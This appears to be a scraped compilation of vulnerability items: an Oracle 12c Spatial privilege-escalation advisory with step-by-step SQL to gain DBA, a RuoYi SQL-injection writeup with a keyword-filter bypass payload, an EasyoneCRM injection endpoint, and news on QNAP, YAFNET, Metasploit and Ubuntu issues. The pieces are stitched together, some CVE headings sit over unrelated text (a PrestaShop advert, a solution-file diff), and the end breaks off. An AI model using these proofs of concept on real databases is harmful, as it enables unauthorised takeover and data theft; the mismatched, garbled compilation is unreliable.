Oracle Database version 12.1.0.2 suffers from a privilege escalation vulnerability that achieves DBA access via the Spatial component.

Title: Oracle Database Privilege Escalation Through Oracle Spatial Component  
Product:                   Database  
Manufacturer:              Oracle  
Affected Version(s):       12.1.0.2  
Tested Version(s):         12cR1  
Risk Level:                High  
Solution Status:           Fixed in Oracle Critical Patch Update October 2021  
CVE Reference:             N/A, Backported in Oracle CPU OCT 2021  
Author of Advisory:        Emad Al-Mousa

Overview:

Privilege Escalation is a famous security vulnerability (explitation technique)..... attackers seek to compromoise IT systems for multiple objectives such as data exfiltration, cause outage,....etc.

*****************************************  
Vulnerability Details:

The following is a privilege escalation vulnerability where an attacker can escalate his/her account permissions to "DBA" role. DBA role in Oracle is a very powerfull role where the user can view & edit any data within the database, create database objects (tables,malcious code,....etc) and many other harmful activities. The vulnerability exists IF the database system has Oracle "Spatial" component is installed. This vulnerability existed in Oracle 12cR1 and backport fix was issued in October 2021.

To check if Oracle Spatial Component is installed, run the following SQL query as it will list ALL installed components within the database system:

SQL> select comp_name from dba_registry;

*****************************************  
Proof of Concept (PoC):

// I will create an account called ironman using SYS account, the account will be granted “create session” to connect to the database and “create any procedure”, and “execute any procedure” permissions:

sqlplus / as sysdba

SQL> create user ironman identified by iron_123;

SQL> grant create session to ironman;

SQL> grant create any procedure to ironman;

SQL> grant execute any procedure to ironman;

SQL> exit;

// I will now connect using the newly created account “ironman” using sql plus

sqlplus ironman/iron_123

SQL> show user

USER is “IRONMAN”

SQL> select * from session_roles;

no rows selected

SQL> create or replace  procedure  SPATIAL_CSW_ADMIN_USR.hulk  (SQL_TEXT  IN  VARCHAR2) as

    BEGIN

    EXECUTE IMMEDIATE (SQL_TEXT);

    END hulk;  
/

SQL> execute SPATIAL_CSW_ADMIN_USR.hulk('grant DATAPUMP_IMP_FULL_DATABASE to ironman');

SQL> select * from session_roles;

no rows selected

SQL> set role DATAPUMP_IMP_FULL_DATABASE;

// ironman account is escalated to the role DATAPUMP_IMP_FULL_DATABASE

SQL> select * from session_roles;

ROLE

——————————————————————————–

DATAPUMP_IMP_FULL_DATABASE

EXP_FULL_DATABASE

SELECT_CATALOG_ROLE

HS_ADMIN_SELECT_ROLE

HS_ADMIN_ROLE

HS_ADMIN_EXECUTE_ROLE

EXECUTE_CATALOG_ROLE

IMP_FULL_DATABASE

8 rows selected.

// the next escalation level is to DBA role !!

SQL> grant dba to ironman;

SQL> set role dba;

SQL> select * from session_roles;

ROLE

——————————————————————————–

DBA

SELECT_CATALOG_ROLE

HS_ADMIN_SELECT_ROLE

HS_ADMIN_ROLE

HS_ADMIN_EXECUTE_ROLE

EXECUTE_CATALOG_ROLE

DELETE_CATALOG_ROLE

EXP_FULL_DATABASE

Advertisements  
Report this ad

IMP_FULL_DATABASE

DATAPUMP_EXP_FULL_DATABASE

DATAPUMP_IMP_FULL_DATABASE

ROLE

——————————————————————————–

GATHER_SYSTEM_STATISTICS

SCHEDULER_ADMIN

XDBADMIN

XDB_SET_INVOKER

JAVA_ADMIN

JAVA_DEPLOY

WM_ADMIN_ROLE

CAPTURE_ADMIN

OPTIMIZER_PROCESSING_RATE

EM_EXPRESS_ALL

EM_EXPRESS_BASIC

22 rows selected.

--- Conclusion:

The account ironman has been successfully elevated  to the “DBA” role which is the highest database role in Oracle database system.

*****************************************  
- Defensive Techniques:

configure auditing to catch any privilege escalation attempts.  
review database account permissions on regular basis.  
ensure database accounts have strong passwords, and rotate passwords regularly if possible.  
perform VA (vulnerability assesment) scans on regular basis.  
pro-actively patch your systems and database systems.

*****************************************  
References:  
https://www.oracle.com/security-alerts/cpuoct2021.html  
https://databasesecurityninja.wordpress.com/2021/10/22/oracle-database-privilege-escalation-through-oracle-spatial-component/comment-page-1/

Credit:   
Security-In-Depth Contributors: Emad Al-Mousa

Oracle Database 12.1.0.2 Spatial Component Privilege Escalation

RuoYi up to v4.7.5 was discovered to contain a SQL injection vulnerability via the component /tool/gen/createTable.

com/ruoyi/generator/controller/GenController 下/tool/gen/createTable路由存在sql注入。

    @RequiresRoles("admin")
    @Log(title = "创建表", businessType = BusinessType.OTHER)
    @PostMapping("/createTable")
    @ResponseBody
    public AjaxResult create(String sql)
    {
        try
        {
            SqlUtil.filterKeyword(sql);
            List<SQLStatement> sqlStatements = SQLUtils.parseStatements(sql, DbType.mysql);
            List<String> tableNames = new ArrayList<>();
            for (SQLStatement sqlStatement : sqlStatements)
            {
                if (sqlStatement instanceof MySqlCreateTableStatement)
                {
                    MySqlCreateTableStatement createTableStatement = (MySqlCreateTableStatement) sqlStatement;
                    if (genTableService.createTable(createTableStatement.toString()))
                    {
                        String tableName = createTableStatement.getTableName().replaceAll("`", "");
                        tableNames.add(tableName);
                    }
                }
            }
            List<GenTable> tableList = genTableService.selectDbTableListByNames(tableNames.toArray(new String[tableNames.size()]));
            String operName = Convert.toStr(PermissionUtils.getPrincipalProperty("loginName"));
            genTableService.importGenTable(tableList, operName);
            return AjaxResult.success();
        }
        catch (Exception e)
        {
            logger.error(e.getMessage(), e);
            return AjaxResult.error("创建表结构异常[" + e.getMessage() + "]");
        }
    }
    

这段代码可以用过/\*\*/绕过关键字

    public static String SQL_REGEX = "select |insert |delete |update |drop |count |exec |chr |mid |master |truncate |char |and |declare ";
    

由于这段代码会将错误信息回显

    logger.error(e.getMessage(), e);
            return AjaxResult.error("创建表结构异常[" + e.getMessage() + "]");
    

poc

    sql=CREATE table ss1 as SELECT/**/* FROM sys_job WHERE 1=1 union/**/SELECT/**/extractvalue(1,concat(0x7e,(select/**/version()),0x7e));
    

**参考链接**

https://github.com/luelueking/ruoyi-4.7.5-vuln-poc/edit/main/README.md

**修复意见**

*   把过滤关键词中的空格去掉
*   对异常处理中的返回信息进行修改，不直接返回e.getMessage()，对报错信息进行抽象以避免报错注入

**报告人**

@陈再

CVE-2022-48114: ruoyi-4.7.5-sqli-vuln-poc[BUG] · Issue #I65V2B · 若依/RuoYi - Gitee.com

Easyone CRM v5.50.02 was discovered to contain a SQL Injection vulnerability via the text parameter at /Services/Misc.asmx/SearchTag.

**EasyoneCRM-5.50.02-SQLinjection**

Easyone One is an Italian CRM company with 14 years of experience with a mission: to organize the sales process of companies, in an increasingly complex and competitive market, through the digitization of one of the most important and strategic activities: the relationship with the customer. Easyone is not a CRM vendor, the company directly produces and develops its own CRM solution for the Italian market.

Easyone developed integration with the most popular management systems on the Italian market: Alyante and Team System Metodo; SageX3, Galileo by San Marco Informatica, Arca by Wolters Kluwer Italia, Business by NTS, MecSal by Passpartout and more.

Easyone has more than 1500 active customers in Italy.

**Description**

The vulnerability allows a remote attacker to execute arbitrary SQL queries on a database.

The vulnerability exists due to insufficient sanitization of user-supplied data. A remote non-authenticated attacker can send a specially crafted request to the affected application and execute arbitrary SQL commands within the application database.

Successful exploitation of this vulnerability may allow a remote attacker to read, delete, modify data in the database and gain complete control over the affected application.

**Versions**

Tested Vulnerable version: 5.50.02

Patched version: 5.50.02.03

**Timeline**

*   30/08/2022 - Contacted Easyone IT department via e-mail regarding the vulnerability
*   05/09/2022 - Contacted Easyone IT department via telephone regarding availability slot to discuss the vulnerability
*   19/09/2022 - Call with Easyone IT department - vulnerability explained and recognized by Easyone IT department
*   19/09/2022 - CVE request approved by Easyone IT department
*   19/09/2022 - Contacted Easyone IT department via e-mail with summary of the call - patching of the vulnerability planned
*   28/10/2022 - Contacted Easyone IT department asking about patching
*   28/10/2022 - Easyone IT department confirms the successful patching and the release of the patched version
*   02/11/2022 - First CVE request sent
*   21/11/2022 - Reminder e-mail to cve.mitre.org
*   29/11/2022 - Reminder e-mail to cve.mitre.org
*   06/12/2022 - Reminder e-mail to cve.mitre.org
*   14/12/2022 - cve.mitre.org asked about advisory
*   15/12/2022 - CVE request with advisory provided to cve.mitre.org

**Execution**

*   Vulnerable **text** parameter via GET: domain.com/Services/Misc.asmx/SearchTag?text=SQLI

**Authors**

Luca Bernardi, Davide Bianchin, Fortunato \[fox\] Lodari @ Deda Cloud Cybersecurity Team

CVE-2022-48082: GitHub - purplededa/EasyoneCRM-5.50.02-SQLinjection

Analysts find that 98% of QNAP NAS are vulnerable to CVE-2022-27596, which allows unauthenticated, remote SQL code injection.

A critical security vulnerability in QNAP's QTS operating system for network-attached storage (NAS) devices could allow cyberattackers to inject malicious code into devices remotely, with no authentication required.

According to researchers from security firm Censys, more than 30,000 hosts are running a vulnerable version of the QNAP-based system as of press time, meaning that approximately 98% of these devices could be attacked.

The issue (CVE-2022-27596) is a SQL injection problem that affects QNAP QTS devices running versions below 5.0.1.2234, and QuTS Hero versions below h5.0.1.2248. It carries a score of 9.8 out of 10 on the CVSS vulnerability-severity scale.

In its advisory this week, QNAP said the bug has a low attack complexity, which, when combined with the popularity of QNAP NAS as a target for Deadbolt ransomware and other threats, could make for imminent exploitation in the wild. And unfortunately, according to Censys, it's a target-rich environment out there.

"Censys has observed 67,415 hosts with indications of running a QNAP-based system; unfortunately, we could only obtain the version number from 30,520 hosts," the firm explained in a blog post on Feb. 1. "We found that of the 30,520 hosts with a version, only 557 were running \[patched versions\], meaning 29,968 hosts could be affected by this vulnerability."

To protect themselves, companies should upgrade their devices to QTS version 5.0.1.2234 and QuTS Hero h5.0.1.2248.

"If the exploit is published and weaponized, it could spell trouble to thousands of QNAP users," Censys researchers warned. "Everyone must upgrade their QNAP devices immediately to be safe from future ransomware campaigns."

Patch Critical Bug Now: QNAP NAS Devices Ripe for the Slaughter

A vulnerability was found in YAFNET up to 3.1.11 and classified as problematic. This issue affects some unknown processing of the component Signature Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.1.12 is able to address this issue. The name of the patch is a1442a2bacc3335461b44c250e81f8d99c60735f. It is recommended to upgrade the affected component. The identifier VDB-220037 was assigned to this vulnerability.

@@ -59,16 +59,8 @@ Project("{9A19103F-16F7-4668-BE54-9A1E7A4F7556}") = "ServiceStack.OrmLite.SqlSer EndProject Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Tests", "Tests", "{66545891-3124-4CAF-897D-2A7280B0A7D4}" EndProject Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Externals", "Externals", "{A3427F65-AE3B-4962-8DC1-93551065C0A6}" EndProject Project("{9A19103F-16F7-4668-BE54-9A1E7A4F7556}") = "YAF.Tests.BasicTests", "..\\tests\\YAF.Tests.BasicTests\\YAF.Tests.BasicTests.csproj", "{51CC78BB-B5C2-46C3-B69D-5023F739B78C}" EndProject Project("{9A19103F-16F7-4668-BE54-9A1E7A4F7556}") = "YAF.Tests.CoreTests", "..\\tests\\YAF.Tests.CoreTests\\YAF.Tests.CoreTests.csproj", "{CEA1C60C-C6A7-4B01-9FC6-6292812E4E5E}" EndProject Project("{9A19103F-16F7-4668-BE54-9A1E7A4F7556}") = "YAF.Tests.Utils", "..\\tests\\YAF.Tests.Utils\\YAF.Tests.Utils.csproj", "{94C11F2B-E560-4075-A43A-59529CFAFC5C}" EndProject Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "HttpSimulator", "..\\tests\\Externals\\HttpSimulator\\HttpSimulator.csproj", "{CE9FFE92-9A64-483C-9F11-A27F83C0E14C}" EndProject Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{B7DF71FA-51C6-4798-887B-8AD4596629C0}" ProjectSection(SolutionItems) = preProject .editorconfig \= .editorconfig @@ -236,18 +228,6 @@ Global {5532392F-3038-428E-BE72-AB78A21BA84F}.Release|Mixed Platforms.Build.0 \= Release|Any CPU {5532392F-3038-428E-BE72-AB78A21BA84F}.Release|x86.ActiveCfg \= Release|Any CPU {5532392F-3038-428E-BE72-AB78A21BA84F}.Release|x86.Build.0 \= Release|Any CPU {51CC78BB-B5C2-46C3-B69D-5023F739B78C}.Debug|Any CPU.ActiveCfg \= Debug|Any CPU {51CC78BB-B5C2-46C3-B69D-5023F739B78C}.Debug|Any CPU.Build.0 \= Debug|Any CPU {51CC78BB-B5C2-46C3-B69D-5023F739B78C}.Debug|Mixed Platforms.ActiveCfg \= Debug|Any CPU {51CC78BB-B5C2-46C3-B69D-5023F739B78C}.Debug|Mixed Platforms.Build.0 \= Debug|Any CPU {51CC78BB-B5C2-46C3-B69D-5023F739B78C}.Debug|x86.ActiveCfg \= Debug|Any CPU {51CC78BB-B5C2-46C3-B69D-5023F739B78C}.Debug|x86.Build.0 \= Debug|Any CPU {51CC78BB-B5C2-46C3-B69D-5023F739B78C}.Release|Any CPU.ActiveCfg \= Release|Any CPU {51CC78BB-B5C2-46C3-B69D-5023F739B78C}.Release|Any CPU.Build.0 \= Release|Any CPU {51CC78BB-B5C2-46C3-B69D-5023F739B78C}.Release|Mixed Platforms.ActiveCfg \= Release|Any CPU {51CC78BB-B5C2-46C3-B69D-5023F739B78C}.Release|Mixed Platforms.Build.0 \= Release|Any CPU {51CC78BB-B5C2-46C3-B69D-5023F739B78C}.Release|x86.ActiveCfg \= Release|Any CPU {51CC78BB-B5C2-46C3-B69D-5023F739B78C}.Release|x86.Build.0 \= Release|Any CPU {CEA1C60C-C6A7-4B01-9FC6-6292812E4E5E}.Debug|Any CPU.ActiveCfg \= Debug|Any CPU {CEA1C60C-C6A7-4B01-9FC6-6292812E4E5E}.Debug|Any CPU.Build.0 \= Debug|Any CPU {CEA1C60C-C6A7-4B01-9FC6-6292812E4E5E}.Debug|Mixed Platforms.ActiveCfg \= Debug|Any CPU @@ -260,30 +240,6 @@ Global {CEA1C60C-C6A7-4B01-9FC6-6292812E4E5E}.Release|Mixed Platforms.Build.0 \= Release|Any CPU {CEA1C60C-C6A7-4B01-9FC6-6292812E4E5E}.Release|x86.ActiveCfg \= Release|Any CPU {CEA1C60C-C6A7-4B01-9FC6-6292812E4E5E}.Release|x86.Build.0 \= Release|Any CPU {94C11F2B-E560-4075-A43A-59529CFAFC5C}.Debug|Any CPU.ActiveCfg \= Debug|Any CPU {94C11F2B-E560-4075-A43A-59529CFAFC5C}.Debug|Any CPU.Build.0 \= Debug|Any CPU {94C11F2B-E560-4075-A43A-59529CFAFC5C}.Debug|Mixed Platforms.ActiveCfg \= Debug|Any CPU {94C11F2B-E560-4075-A43A-59529CFAFC5C}.Debug|Mixed Platforms.Build.0 \= Debug|Any CPU {94C11F2B-E560-4075-A43A-59529CFAFC5C}.Debug|x86.ActiveCfg \= Debug|Any CPU {94C11F2B-E560-4075-A43A-59529CFAFC5C}.Debug|x86.Build.0 \= Debug|Any CPU {94C11F2B-E560-4075-A43A-59529CFAFC5C}.Release|Any CPU.ActiveCfg \= Release|Any CPU {94C11F2B-E560-4075-A43A-59529CFAFC5C}.Release|Any CPU.Build.0 \= Release|Any CPU {94C11F2B-E560-4075-A43A-59529CFAFC5C}.Release|Mixed Platforms.ActiveCfg \= Release|Any CPU {94C11F2B-E560-4075-A43A-59529CFAFC5C}.Release|Mixed Platforms.Build.0 \= Release|Any CPU {94C11F2B-E560-4075-A43A-59529CFAFC5C}.Release|x86.ActiveCfg \= Release|Any CPU {94C11F2B-E560-4075-A43A-59529CFAFC5C}.Release|x86.Build.0 \= Release|Any CPU {CE9FFE92-9A64-483C-9F11-A27F83C0E14C}.Debug|Any CPU.ActiveCfg \= Debug|Any CPU {CE9FFE92-9A64-483C-9F11-A27F83C0E14C}.Debug|Any CPU.Build.0 \= Debug|Any CPU {CE9FFE92-9A64-483C-9F11-A27F83C0E14C}.Debug|Mixed Platforms.ActiveCfg \= Debug|Any CPU {CE9FFE92-9A64-483C-9F11-A27F83C0E14C}.Debug|Mixed Platforms.Build.0 \= Debug|Any CPU {CE9FFE92-9A64-483C-9F11-A27F83C0E14C}.Debug|x86.ActiveCfg \= Debug|Any CPU {CE9FFE92-9A64-483C-9F11-A27F83C0E14C}.Debug|x86.Build.0 \= Debug|Any CPU {CE9FFE92-9A64-483C-9F11-A27F83C0E14C}.Release|Any CPU.ActiveCfg \= Release|Any CPU {CE9FFE92-9A64-483C-9F11-A27F83C0E14C}.Release|Any CPU.Build.0 \= Release|Any CPU {CE9FFE92-9A64-483C-9F11-A27F83C0E14C}.Release|Mixed Platforms.ActiveCfg \= Release|Any CPU {CE9FFE92-9A64-483C-9F11-A27F83C0E14C}.Release|Mixed Platforms.Build.0 \= Release|Any CPU {CE9FFE92-9A64-483C-9F11-A27F83C0E14C}.Release|x86.ActiveCfg \= Release|Any CPU {CE9FFE92-9A64-483C-9F11-A27F83C0E14C}.Release|x86.Build.0 \= Release|Any CPU {AA001480-3713-4927-8650-ED1E16AFB791}.Debug|Any CPU.ActiveCfg \= Debug|Any CPU {AA001480-3713-4927-8650-ED1E16AFB791}.Debug|Any CPU.Build.0 \= Debug|Any CPU {AA001480-3713-4927-8650-ED1E16AFB791}.Debug|Mixed Platforms.ActiveCfg \= Debug|Any CPU @@ -322,11 +278,7 @@ Global {9E7362F6-25FE-4E06-884D-92AEA9A28D45} = {C9CC269F-1DC1-4189-9116-12EB6A726F0B} {BF9FE592-B675-4097-9F69-B2776FAC347F} = {C9CC269F-1DC1-4189-9116-12EB6A726F0B} {5532392F-3038-428E-BE72-AB78A21BA84F} = {A61BA819-987E-4F04-B4D8-0960363558C5} {A3427F65-AE3B-4962-8DC1-93551065C0A6} = {66545891-3124-4CAF-897D-2A7280B0A7D4} {51CC78BB-B5C2-46C3-B69D-5023F739B78C} = {66545891-3124-4CAF-897D-2A7280B0A7D4} {CEA1C60C-C6A7-4B01-9FC6-6292812E4E5E} = {66545891-3124-4CAF-897D-2A7280B0A7D4} {94C11F2B-E560-4075-A43A-59529CFAFC5C} = {66545891-3124-4CAF-897D-2A7280B0A7D4} {CE9FFE92-9A64-483C-9F11-A27F83C0E14C} = {A3427F65-AE3B-4962-8DC1-93551065C0A6} {AA001480-3713-4927-8650-ED1E16AFB791} = {A61BA819-987E-4F04-B4D8-0960363558C5} {7C82AFFA-FB8A-4227-BC7F-0697F7ED58F6} = {BDA94567-4516-4110-9743-085C36B24E35} EndGlobalSection

CVE-2023-0650: [FIXED] Stored XSS in Signature · YAFNET/YAFNET@a1442a2

The total number of 61,000 open vulnerabilities, including 1,700 critical ones that have been open for 180+ days, exposes businesses to potential attacks.

Indusface's research on 1,400+ Web apps, mobile apps, and APIs revealed that open vulnerabilities remain cybercriminals' most significant attack vector.

According to the report, 829 million attacks were blocked on the AppTrana WAF in the fourth quarter of 2022, a 79% increase from the third quarter.

The alarming finding is that 61,713 open vulnerabilities were found, which is a 50% jump from the third quarter. The number of open vulnerabilities directly relates to the increased threat actors.

How can you protect them? The best option is to fix known vulnerabilities using virtual patching at the WAF level while blocking attacks.

**Critical Vulnerabilities Found on Applications**

While any vulnerability carries a risk to your business, here are the top 10 high/critical vulnerabilities that hackers attempted to exploit during the fourth quarter of 2022:

*   Server-side request forgery
*   HTML injection
*   Cross-site scripting (XSS)
*   TLS/SSL server certificate will expire soon
*   Script source code disclosure
*   SQL injection
*   SSL certificate common name mismatch
*   TLS/SSL server certificate expired
*   Untrusted TLS/SSL server certificate
*   Insecure Direct Object References

Prioritize addressing these vulnerabilities if you have not done so already.

**Cost of Vulnerabilities**

A single vulnerability can invite thousands of cybersecurity troubles. Poodle, Heartbleed, EternalBlue, and Shellshock are just a few of the vulnerabilities that open businesses to security threats.

The report found 31% of vulnerabilities have been open for 180+ days. And 1,700+ of these are rated as critical and high vulnerabilities.

So, what happens if you don't patch the vulnerabilities? A failure to maintain this responsibility could have severe effects, including potential security breaches.

Back in 2017, the massive Equifax security breach made headlines. Hackers exploited the known vulnerability CVE-2017-5638 in their app framework and gained access to the company's system.

This breach exposed the personally identifiable information (PII) of 147 million people. Two years after the breach, the company said it spent $1.4 billion on cleanup costs and revamping its security program. Equifax agreed to pay up to $700 million to settle claims related to the breach.

The breach's total cost is likely higher than the reported settlements and expenses. It also includes intangible costs such as loss of trust, brand reputation, and long-term impact on the business.

**Managing Vulnerabilities With Virtual Patching**

Security patches play a vital role in dealing with vulnerabilities. They patch up the security gaps and resolve the risks. After all, successful exploitation means an insecure configuration or missing security control.

The patching process can, at times, be challenging. Many companies turn to virtual patching to protect their apps on the Web application firewall (WAF) when a system can't be patched immediately.

Virtual patching is a vulnerability shield that secures apps during your risk window and beyond. It enables you to scale your coverage and responses accordingly with appropriate defense, which can be applied in minutes or hours. Thereby, it reduces the risk of exposure to vulnerabilities.

Virtual patching is attained by implementing a security policy layer in the WAF. It eliminates application vulnerabilities without changing the codebase.

Companies can leverage virtual patching in two ways to mitigate vulnerabilities:

1.  Core rules
2.  Custom rules

The Indusface report found that the WAF core rule set blocks 40% of requests, and custom rules block 60%.

**Why Are the Custom Rules Gaining Momentum?**

Core rules are predefined, standardized, based on industry best practices, and designed to protect against known vulnerabilities. Security experts typically create these rules. Core rules are easy to implement and can provide high protection.

Since most dev teams work on sprints that are a few weeks long, vulnerabilities keep getting added with the changing code.

Most companies leverage weekly scans and periodic penetration testing on applications. Since fixing these on code will be long and arduous, product owners rely on WAF's custom rules to plug these vulnerabilities while their dev team focuses on shipping features.

Whenever the teams get to a security-focused sprint, they fix these vulnerabilities in the code.

Virtual patching is also used as a risk mitigation mechanism. For instance, we have observed that geofencing is gaining popularity in the custom rule category as application owners look to limit traffic from geographies where the application is not designed to be used. The other example is blacklisting or whitelisting IPs that are used to allow traffic to the application.

**False Positive Monitoring**

While the power of custom rules is undisputed, they also add the burden of monitoring applications for false positives.

In talking to several security leaders, one consistent theme that we keep hearing about is the lack of skilled security practitioners who can manage a complex application like a WAF/WAAP.

The other challenge is the worsening economy; security teams are increasingly being asked to do more with less.

We are seeing an increased trend of product owners relying on managed services to help with virtual patches and guarantee no false positives.

**Conclusion**

If the attackers discover a piece of exploitable code, the next step is taking advantage of the vulnerability.

The sooner you deploy the virtual patching, the sooner attackers look elsewhere. Keep your WAF running to ensure your security and bottom line.

**About the Author**

    

Venky is an application security technologist who built the new-age Web application scanner and cloud WAF AppTrana at Indusface as a founding CTO. Currently, he spends his time on driving product road map, customer success, growth, and technology adoption for US businesses.

AppSec Playbook 2023: Study of 829M Attacks on 1,400 Websites

PrestaShop module, totadministrativemandate before v1.7.1 was discovered to contain a SQL injection vulnerability.

**Your ecommerce.  
Your brand. Your rules.**

PrestaShop offers you a highly flexible and scalable ecommerce platform to launch an online business 100% owned and designed by you.

**Everything you need to sell products online**

All the ecommerce features you need, and more. With PrestaShop, develop your commerce online and grow your business.

**Customize your online store**

Personalize your ecommerce website: pick a theme, specific features, and everything your brand needs.

**Run your ecommerce website**

Manage everything from your website back office: product catalog, orders, payments, shipping, and data.

**Grow your revenue**

Scale your business with PrestaShop: launch marketing campaigns to reach more customers.

**Go international**

Sell across borders: conquer new markets with a multilanguage store and multicurrency options.

Take a look at what PrestaShop looks like from the back office.

**Join over 300,000 merchants**

“

Thanks to PrestaShop software, we were able to create a multilingual and multi-currency ecommerce site at a very reasonable total cost.

”

Chief Operating Officer, Bobbies

“

PrestaShop is a reliable software that has enabled us to constantly evolve our site over the last 6 years, all while allowing us to work independently, thanks to an intuitive back office.

”

Daan Sins

Co-founder, Huygens

“

PrestaShop is a handy, modular tool that allows us to continue to develop our omnichannel strategy.

”

Wassila Moussaoui

Digital Marketing and Communication Director, Pylones

**Be part of a thriving ecosystem**

PrestaShop is not only software, PrestaShop is also a thriving ecosystem of agencies, developers, and users.

Our partners are here to help

**Ready to sell online?**

Build your online store with PrestaShop in just a few clicks, or find the right expert to help you.

CVE-2022-46965: Create and build your online business with PrestaShop

Rapid7 Metasploit Pro versions 4.21.2 and lower suffer from a stored cross site scripting vulnerability, due to a lack of JavaScript request string sanitization. Using this vulnerability, an authenticated attacker can execute arbitrary HTML and script code in the target browser against another Metasploit Pro user using a specially crafted request. Note that in most deployments, all Metasploit Pro users tend to enjoy privileges equivalent to local administrator.

*   Pro: We completed dependency updates required to support the latest Metasploit Framework version 6.3.
    
*   Pro: We completed a periodic update of the Java Runtime to maintain a good security posture.
    
*   PR 16685 - Updates the Kerberos Authentication support to include multiple new encryption types, which will allow Kerberos Authentication to work against newer targets that have older encryption types disabled.
    
*   PR 16689 - Adds support for host addresses in kerberos tickets.
    
*   PR 16700 - Updates LDAP modules to support Kerberos and NTLM authentication.
    
*   PR 16749 - Adds Kerberos Authentication support to WinRM modules.
    
*   PR 16760 - Updates WinRM sessions to support delegated Kerberos tickets, to be able to access additional network resources from the compromised server.
    
*   PR 16770 - This enables the reuse of previously obtained CCache files for MSSQL, SMB, WinRM, and LDAP authentication. After a successful authentication using Kerberos, tickets are stored in CCache files. They will be reused for subsequent authentications without having to renegotiate new Kerberos tickets.
    
*   PR 17025 - Adds a new USER_RID option to the Kerberos ticket forging module auxiliary/admin/kerberos/forge_ticket.
    
*   PR 17340 - The Python Meterpreter has been updated to warn that the bind information is ignored when a reverse port forward is created to prevent confusion when this information is supplied by a user.
    
*   PR 17343 - This makes performance improvements to the windows/local/unquoted_service_path module.
    
*   PR 17373 - Adds ticket flags when presenting krb5 ccaches on msfconsole.
    
*   PR 17374 - Adds klist command support to list Kerberos tickets in the database.
    
*   PR 17451 - This adds netntlm and netntlmv2 hashes support to auxiliary/analyze/crack_windows module.
    
*   PR 17456 - This PR adds a new KrbOfferedEncryptionTypes option that allows users to configure what encryption types are used with the KDC.
    
*   PR 17466 - This updates the auxiliary/scanner/smb/smb_version module to store additional service information in the database so it can be viewed later.
    
*   PR 17473 - Updates the docs site to have an edit link at the bottom of each page which will take you to the corresponding markdown file on Github for editing.
    
*   PR 17475 - Enables the datastore\_fallbacks feature flag by default. This is a rewrite of Metasploit's datastore to fix multiple bugs and edge-cases. The unset command will now consistently unset previously set datastore values, so that default values are used once again.
    
*   PR 17480 - A new alias has been added for payloads called exploit which will perform the same action as to_handler, to help users familiar with exploit modules to use the same familiar exploit method to open handlers when using payloads.
    
*   PR 17518 - A new adapter has been added to run Python payloads on Windows. This is notably useful for testing Python payloads as SYSTEM or delivered on demand through an exploit module such as psexec.
    
*   PR 17519 - Improves the SMTP delivery error handling for the auxiliary/client/smtp/emailer module.
    
*   PR 17526 - Updates the show options and show advanced command to visually group options with the same conditions together, such as options that require an action or datastore value to be set.
    
*   PR 17535 - This adds NTLM hash recover to the kerberos/get\_ticket module.
    
*   PR 17539 - Adds additional error handling for Kerberos error codes.
    

*   Pro: We addressed CVE-2023-0599, a stored XSS vulnerability on the individual host services page reported by Michael Caruso. Thank you for the coordinated disclosure.
    
*   Pro: We improved the CLI startup process to ensure running tasks are no longer interrupted by starting a Pro console.
    
*   PR 17385 - This PR fixes the file write and file append methods to return the expected Boolean values rather than nil.
    
*   PR 17455 - Fixes an issue where Kerberos responses could not be received in smaller chunks, such as in bandwidth restricted networks.
    
*   PR 17482 - Fixes a connection issue with reverse\_https stagers that are executed on Windows servers attempting to negotiate TLS1 when Metasploit was using OpenSSL3.
    
*   PR 17491 - A bug has been fixed in the lib/msf/core/exploit/remote/ldap.rb library that handles LDAP communications for several modules to ensure that failures use the right namespace when throwing errors to prevent crashes.
    
*   PR 17497 - This fixes an error where modules that issue certificates (icpr\_cert and now auxiliary/admin/dcerpc/cve\_2022\_26923\_certifried) would crash if the response from the server was that the certificate was submitted and no certificate was returned. This updates the code to check if the certificate is present before attempting to process it.
    
*   PR 17516 - The version of metasploit-payloads has been bumped up to add support for dual IPv4/IPv6 stacks to Python Meterpreter, add support for enumerating desktops with the enumdesktops command to Python Meterpreter, and also add support for binding to the specified localhost to compiled versions of Meterpreter.
    
*   PR 17525 - Fixes a deprecation warning when using socks proxy support in Metasploit.
    
*   PR 17541 - Fixes a crash that occurs when domain option is set to blank.
    
*   PR 17549 - Updates the inspect_ticket module to output a user friendly error if the ticket decryption has failed, i.e. due to an invalid decryption key.
    

*   PR 16625 - Adds a new scanner/kerberos/kerberos_login module for bruteforcing and verifying credentials against a Kerberos server. Accounts which do not require preauthnetication, i.e. AS-REP Roastable accounts, will have the hashes output for offline cracking.
    
*   PR 17348 - This PR adds a module that performs a DoS attack on Mirage Firewall versions 0.8.0-0.8.3.
    
*   PR 17407 - This adds an exploit that targets various versions of Cacti network-monitoring software. For versions 1.2.22 and below, there exists an unauthenticated command injection vulnerability in remote_agent.php that when exploited, will result in remote code execution as the user running the Cacti server.
    
*   PR 17449 - A new module has been added for CVE-2021-44529, an unauthenticated code injection vulnerability in the Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512. Successful exploitation requires sending a crafted cookie to the client endpoint at /client/index.php to get command execution as the nobody user.
    
*   PR 17479 - This adds an exploit module that leverages an unauthenticated SQLi against Wordpress plugin Paid Membership Pro. This vulnerability is identified as CVE-2023-23488 and affects versions prior to 2.9.8. This module retrieves Wordpress usernames and password hashes using Time-Based Blind SQL Injection technique.
    
*   PR 17533 - Enhances the auxiliary/admin/kerberos/get\_ticket module with PKINIT functionality.

CVE-2023-0599: Metasploit Release Notes

Ubuntu Security Notice 4781-2 - USN-4781-1 fixed several vulnerabilities in Slurm. This update provides the corresponding updates for Ubuntu 14.04 ESM and Ubuntu 16.04 ESM. It was discovered that Slurm incorrectly handled certain messages between the daemon and the user. An attacker could possibly use this issue to assume control of an arbitrary file on the system. This issue only affected Ubuntu 16.04 ESM.

==========================================================================  
Ubuntu Security Notice USN-4781-2  
February 01, 2023

slurm-llnl vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 ESM  
- Ubuntu 14.04 ESM

Summary:

Several security issues were fixed in Slurm.

Software Description:  
- slurm-llnl: Simple Linux Utility for Resource Management

Details:

USN-4781-1 fixed several vulnerabilities in Slurm. This update provides  
the corresponding updates for Ubuntu 14.04 ESM (CVE-2016-10030) and  
Ubuntu 16.04 ESM (CVE-2018-10995).

Original advisory details:

